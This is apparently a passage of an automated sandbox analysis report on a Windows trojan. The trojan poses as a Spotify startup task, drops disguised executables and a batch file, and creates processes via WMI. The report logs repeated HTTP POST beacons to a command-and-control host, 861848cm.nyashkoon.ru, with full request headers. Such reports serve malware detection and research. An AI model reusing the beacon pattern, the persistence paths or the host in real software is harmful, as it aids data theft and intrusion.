                                    Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 861848cm.nyashkoon.ruContent-Length: 1024Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 861848cm.nyashkoon.ruContent-Length: 1016Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 861848cm.nyashkoon.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 861848cm.nyashkoon.ruContent-Length: 1024Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 861848cm.nyashkoon.ruContent-Length: 1024Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 861848cm.nyashkoon.ruContent-Length: 1016Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 861848cm.nyashkoon.ruContent-Length: 1024Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 861848cm.nyashkoon.ruContent-Length: 1284Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 861848cm.nyashkoon.ruContent-Length: 1024Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 861848cm.nyashkoon.ruContent-Length: 1024Expect: 100-continueConnection: Keep-Alive
                                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                    Source: global trafficDNS traffic detected: DNS query: 861848cm.nyashkoon.ru
                                    Source: unknownHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 861848cm.nyashkoon.ruContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                                    Source: svchost.exe, 00000033.00000003.2014632536.00000216FD578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
                                    Source: svchost.exe, 00000033.00000003.2014632536.00000216FD578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
                                    Source: svchost.exe, 00000033.00000003.2014632536.00000216FD578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
                                    Source: svchost.exe, 00000033.00000003.2014632536.00000216FD578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
                                    Source: svchost.exe, 00000033.00000003.2014632536.00000216FD578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
                                    Source: svchost.exe, 00000033.00000003.2014632536.00000216FD578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
                                    Source: svchost.exe, 00000033.00000003.2014632536.00000216FD5AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
                                    Source: svchost.exe, 00000033.00000003.2014632536.00000216FD5F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
                                    Source: powershell.exe, 0000001B.00000002.3178907715.0000020690078000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.3193885665.0000017991AF8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.3255400804.00000206D76D8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.3097644752.0000028590078000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                                    Source: powershell.exe, 00000023.00000002.2052697586.000001C4AA558000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                                    Source: powershell.exe, 0000001B.00000002.2030090059.0000020680228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2032310159.0000017981CA8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2043071591.000001E5DFEB8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.2049783465.00000206C7888000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.2028020495.0000028580228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2052697586.000001C4AA558000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                                    Source: Bridgecommon.exe, 00000005.00000002.1911325001.0000000003CB7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.2030090059.0000020680001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2032310159.0000017981A81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2043071591.000001E5DFC91000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.2049783465.00000206C7661000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.2028020495.0000028580001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2052697586.000001C4AA331000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                                    Source: powershell.exe, 0000001B.00000002.2030090059.0000020680228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2032310159.0000017981CA8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2043071591.000001E5DFEB8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.2049783465.00000206C7888000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.2028020495.0000028580228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2052697586.000001C4AA558000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                                    Source: powershell.exe, 00000023.00000002.2052697586.000001C4AA558000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                                    Source: powershell.exe, 0000001B.00000002.2030090059.0000020680001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2032310159.0000017981A81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2043071591.000001E5DFC91000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.2049783465.00000206C7661000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.2028020495.0000028580001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2052697586.000001C4AA331000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                                    Source: powershell.exe, 00000021.00000002.3097644752.0000028590078000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                                    Source: powershell.exe, 00000021.00000002.3097644752.0000028590078000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                                    Source: powershell.exe, 00000021.00000002.3097644752.0000028590078000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                                    Source: svchost.exe, 00000033.00000003.2014632536.00000216FD622000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
                                    Source: svchost.exe, 00000033.00000003.2014632536.00000216FD67A000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000033.00000003.2014632536.00000216FD56E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
                                    Source: svchost.exe, 00000033.00000003.2014632536.00000216FD622000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV2
                                    Source: svchost.exe, 00000033.00000003.2014632536.00000216FD603000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000033.00000003.2014632536.00000216FD654000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
                                    Source: svchost.exe, 00000033.00000003.2014632536.00000216FD622000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
                                    Source: powershell.exe, 00000023.00000002.2052697586.000001C4AA558000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                                    Source: powershell.exe, 0000001B.00000002.3178907715.0000020690078000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.3193885665.0000017991AF8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.3255400804.00000206D76D8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.3097644752.0000028590078000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                                    Source: svchost.exe, 00000033.00000003.2014632536.00000216FD622000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
                                    Source: svchost.exe, 00000033.00000003.2014632536.00000216FD5D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeWindow created: window name: CLIPBRDWNDCLASS

                                    System Summary

                                    barindex
                                    Windows Scripting host queries suspicious COM object (likely to drop second stage)
                                    Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                                    Source: C:\Users\user\Desktop\3AAyq819Vy.exeCode function: 0_2_00CA6FAA: __EH_prolog,_wcslen,_wcslen,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,0_2_00CA6FAA
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: c:\Windows\System32\CSCA1C1A0ABC4644F3ABFA5FB833E2CF3E.TMPJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: c:\Windows\System32\SecurityHealthSystray.exeJump to behavior
                                    Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile deleted: C:\Windows\System32\CSCA1C1A0ABC4644F3ABFA5FB833E2CF3E.TMPJump to behavior
                                    Source: C:\Users\user\Desktop\3AAyq819Vy.exeCode function: 0_2_00CA848E0_2_00CA848E
                                    Source: C:\Users\user\Desktop\3AAyq819Vy.exeCode function: 0_2_00CA40FE0_2_00CA40FE
                                    Source: C:\Users\user\Desktop\3AAyq819Vy.exeCode function: 0_2_00CB40880_2_00CB4088
                                    Source: C:\Users\user\Desktop\3AAyq819Vy.exeCode function: 0_2_00CB00B70_2_00CB00B7
                                    Source: C:\Users\user\Desktop\3AAyq819Vy.exeCode function: 0_2_00CC51C90_2_00CC51C9
                                    Source: C:\Users\user\Desktop\3AAyq819Vy.exeCode function: 0_2_00CB71530_2_00CB7153
                                    Source: C:\Users\user\Desktop\3AAyq819Vy.exeCode function: 0_2_00CB62CA0_2_00CB62CA
                                    Source: C:\Users\user\Desktop\3AAyq819Vy.exeCode function: 0_2_00CA32F70_2_00CA32F7
                                    Source: C:\Users\user\Desktop\3AAyq819Vy.exeCode function: 0_2_00CB43BF0_2_00CB43BF
                                    Source: C:\Users\user\Desktop\3AAyq819Vy.exeCode function: 0_2_00CCD4400_2_00CCD440
                                    Source: C:\Users\user\Desktop\3AAyq819Vy.exeCode function: 0_2_00CAF4610_2_00CAF461
                                    Source: C:\Users\user\Desktop\3AAyq819Vy.exeCode function: 0_2_00CAC4260_2_00CAC426
                                    Source: C:\Users\user\Desktop\3AAyq819Vy.exeCode function: 0_2_00CB77EF0_2_00CB77EF
                                    Source: C:\Users\user\Desktop\3AAyq819Vy.exeCode function: 0_2_00CCD8EE0_2_00CCD8EE
                                    Source: C:\Users\user\Desktop\3AAyq819Vy.exeCode function: 0_2_00CA286B0_2_00CA286B
                                    Source: C:\Users\user\Desktop\3AAyq819Vy.exeCode function: 0_2_00CD19F40_2_00CD19F4
                                    Source: C:\Users\user\Desktop\3AAyq819Vy.exeCode function: 0_2_00CAE9B70_2_00CAE9B7
                                    Source: C:\Users\user\Desktop\3AAyq819Vy.exeCode function: 0_2_00CB6CDC0_2_00CB6CDC
                                    Source: C:\Users\user\Desktop\3AAyq819Vy.exeCode function: 0_2_00CB3E0B0_2_00CB3E0B
                                    Source: C:\Users\user\Desktop\3AAyq819Vy.exeCode function: 0_2_00CAEFE20_2_00CAEFE2
                                    Source: C:\Users\user\Desktop\3AAyq819Vy.exeCode function: 0_2_00CC4F9A0_2_00CC4F9A
                                    Source: C:\hyperContaineragent\Bridgecommon.exeCode function: 5_2_00007FFD9BAD0D785_2_00007FFD9BAD0D78
                                    Source: C:\hyperContaineragent\Bridgecommon.exeCode function: 5_2_00007FFD9BE7F3525_2_00007FFD9BE7F352
                                    Source: C:\hyperContaineragent\Bridgecommon.exeCode function: 5_2_00007FFD9BE71F885_2_00007FFD9BE71F88
                                    Source: C:\hyperContaineragent\Bridgecommon.exeCode function: 5_2_00007FFD9BE747485_2_00007FFD9BE74748
                                    Source: C:\hyperContaineragent\Bridgecommon.exeCode function: 5_2_00007FFD9BE7E5A65_2_00007FFD9BE7E5A6
                                    Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exeCode function: 52_2_00007FFD9BAB0D7852_2_00007FFD9BAB0D78
                                    Source: C:\hyperContaineragent\Bridgecommon.exeCode function: 53_2_00007FFD9BAA0D7853_2_00007FFD9BAA0D78
                                    Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exeCode function: 54_2_00007FFD9BAC0D7854_2_00007FFD9BAC0D78
                                    Source: C:\hyperContaineragent\Bridgecommon.exeCode function: 55_2_00007FFD9BAE09AC55_2_00007FFD9BAE09AC
                                    Source: C:\hyperContaineragent\Bridgecommon.exeCode function: 55_2_00007FFD9BAD0D7855_2_00007FFD9BAD0D78
                                    Source: C:\hyperContaineragent\Bridgecommon.exeCode function: 55_2_00007FFD9BB0100055_2_00007FFD9BB01000
                                    Source: C:\hyperContaineragent\Bridgecommon.exeCode function: 55_2_00007FFD9BB0CE3A55_2_00007FFD9BB0CE3A
                                    Source: C:\hyperContaineragent\Bridgecommon.exeCode function: 55_2_00007FFD9BB0921355_2_00007FFD9BB09213
                                    Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exeCode function: 56_2_00007FFD9BAB0D7856_2_00007FFD9BAB0D78
                                    Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exeCode function: 56_2_00007FFD9BAC09AC56_2_00007FFD9BAC09AC
                                    Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exeCode function: 56_2_00007FFD9BAE100056_2_00007FFD9BAE1000
                                    Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exeCode function: 56_2_00007FFD9BAE921356_2_00007FFD9BAE9213
                                    Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exeCode function: 56_2_00007FFD9BAECE3A56_2_00007FFD9BAECE3A
                                    Source: C:\hyperContaineragent\Bridgecommon.exeCode function: 57_2_00007FFD9BAD0D7857_2_00007FFD9BAD0D78
                                    Source: C:\hyperContaineragent\Bridgecommon.exeCode function: 57_2_00007FFD9BAE09AC57_2_00007FFD9BAE09AC
                                    Source: C:\hyperContaineragent\Bridgecommon.exeCode function: 57_2_00007FFD9BB0100057_2_00007FFD9BB01000
                                    Source: C:\hyperContaineragent\Bridgecommon.exeCode function: 57_2_00007FFD9BB0CE3A57_2_00007FFD9BB0CE3A
                                    Source: C:\hyperContaineragent\Bridgecommon.exeCode function: 57_2_00007FFD9BB0921357_2_00007FFD9BB09213
                                    Source: Joe Sandbox ViewDropped File: C:\Users\user\Desktop\EEEoXuLc.log DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                    Source: C:\Users\user\Desktop\3AAyq819Vy.exeCode function: String function: 00CBF5F0 appears 31 times
                                    Source: C:\Users\user\Desktop\3AAyq819Vy.exeCode function: String function: 00CBEB78 appears 39 times
                                    Source: C:\Users\user\Desktop\3AAyq819Vy.exeCode function: String function: 00CBEC50 appears 56 times
                                    Source: 3AAyq819Vy.exe, 00000000.00000003.1725117408.0000000004D46000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs 3AAyq819Vy.exe
                                    Source: 3AAyq819Vy.exe, 00000000.00000003.1724034780.00000000063AB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs 3AAyq819Vy.exe
                                    Source: 3AAyq819Vy.exeBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs 3AAyq819Vy.exe
                                    Source: 3AAyq819Vy.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                    Source: Bridgecommon.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: nFQRHbQjcuhfqIAubZpdQD.exe.5.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: nFQRHbQjcuhfqIAubZpdQD.exe0.5.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: 0.3.3AAyq819Vy.exe.4d94700.1.raw.unpack, hpJE61kMAL8Awig2KFg.csCryptographic APIs: 'CreateDecryptor'
                                    Source: 0.3.3AAyq819Vy.exe.4d94700.1.raw.unpack, hpJE61kMAL8Awig2KFg.csCryptographic APIs: 'CreateDecryptor'
                                    Source: 0.3.3AAyq819Vy.exe.4d94700.1.raw.unpack, hpJE61kMAL8Awig2KFg.csCryptographic APIs: 'CreateDecryptor'
                                    Source: 0.3.3AAyq819Vy.exe.4d94700.1.raw.unpack, hpJE61kMAL8Awig2KFg.csCryptographic APIs: 'CreateDecryptor'
                                    Source: 0.3.3AAyq819Vy.exe.63f9700.0.raw.unpack, hpJE61kMAL8Awig2KFg.csCryptographic APIs: 'CreateDecryptor'
                                    Source: 0.3.3AAyq819Vy.exe.63f9700.0.raw.unpack, hpJE61kMAL8Awig2KFg.csCryptographic APIs: 'CreateDecryptor'
                                    Source: 0.3.3AAyq819Vy.exe.63f9700.0.raw.unpack, hpJE61kMAL8Awig2KFg.csCryptographic APIs: 'CreateDecryptor'
                                    Source: 0.3.3AAyq819Vy.exe.63f9700.0.raw.unpack, hpJE61kMAL8Awig2KFg.csCryptographic APIs: 'CreateDecryptor'
                                    Source: classification engineClassification label: mal100.spre.troj.expl.evad.winEXE@53/56@1/2
                                    Source: C:\Users\user\Desktop\3AAyq819Vy.exeCode function: 0_2_00CA6C74 GetLastError,FormatMessageW,0_2_00CA6C74
                                    Source: C:\Users\user\Desktop\3AAyq819Vy.exeCode function: 0_2_00CBA6C2 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,0_2_00CBA6C2
                                    Source: C:\hyperContaineragent\Bridgecommon.exeFile created: C:\Program Files (x86)\windows sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exeJump to behavior
                                    Source: C:\hyperContaineragent\Bridgecommon.exeFile created: C:\Users\user\Desktop\tYJQSSrA.logJump to behavior
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeMutant created: \Sessions\1\BaseNamedObjects\Local\DCR_MUTEX-fMqIIZ3msKTluYQzOgJz
                                    Source: C:\hyperContaineragent\Bridgecommon.exeMutant created: NULL
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7600:120:WilError_03
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7808:120:WilError_03
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3412:120:WilError_03
                                    Source: C:\hyperContaineragent\Bridgecommon.exeFile created: C:\Users\user\AppData\Local\Temp\ih0xhhgmJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\hyperContaineragent\CYWN6IDJqLBtl0YjSrMSw1hYURgrvXzRLx.bat" "
                                    Source: C:\Users\user\Desktop\3AAyq819Vy.exeCommand line argument: sfxname0_2_00CBDF1E
                                    Source: C:\Users\user\Desktop\3AAyq819Vy.exeCommand line argument: sfxstime0_2_00CBDF1E
                                    Source: C:\Users\user\Desktop\3AAyq819Vy.exeCommand line argument: STARTDLG0_2_00CBDF1E
                                    Source: 3AAyq819Vy.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: 3AAyq819Vy.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                    Source: C:\hyperContaineragent\Bridgecommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\hyperContaineragent\Bridgecommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\hyperContaineragent\Bridgecommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\hyperContaineragent\Bridgecommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\hyperContaineragent\Bridgecommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\hyperContaineragent\Bridgecommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\hyperContaineragent\Bridgecommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\hyperContaineragent\Bridgecommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\hyperContaineragent\Bridgecommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\hyperContaineragent\Bridgecommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\hyperContaineragent\Bridgecommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\hyperContaineragent\Bridgecommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\hyperContaineragent\Bridgecommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\hyperContaineragent\Bridgecommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\hyperContaineragent\Bridgecommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\hyperContaineragent\Bridgecommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\hyperContaineragent\Bridgecommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\hyperContaineragent\Bridgecommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
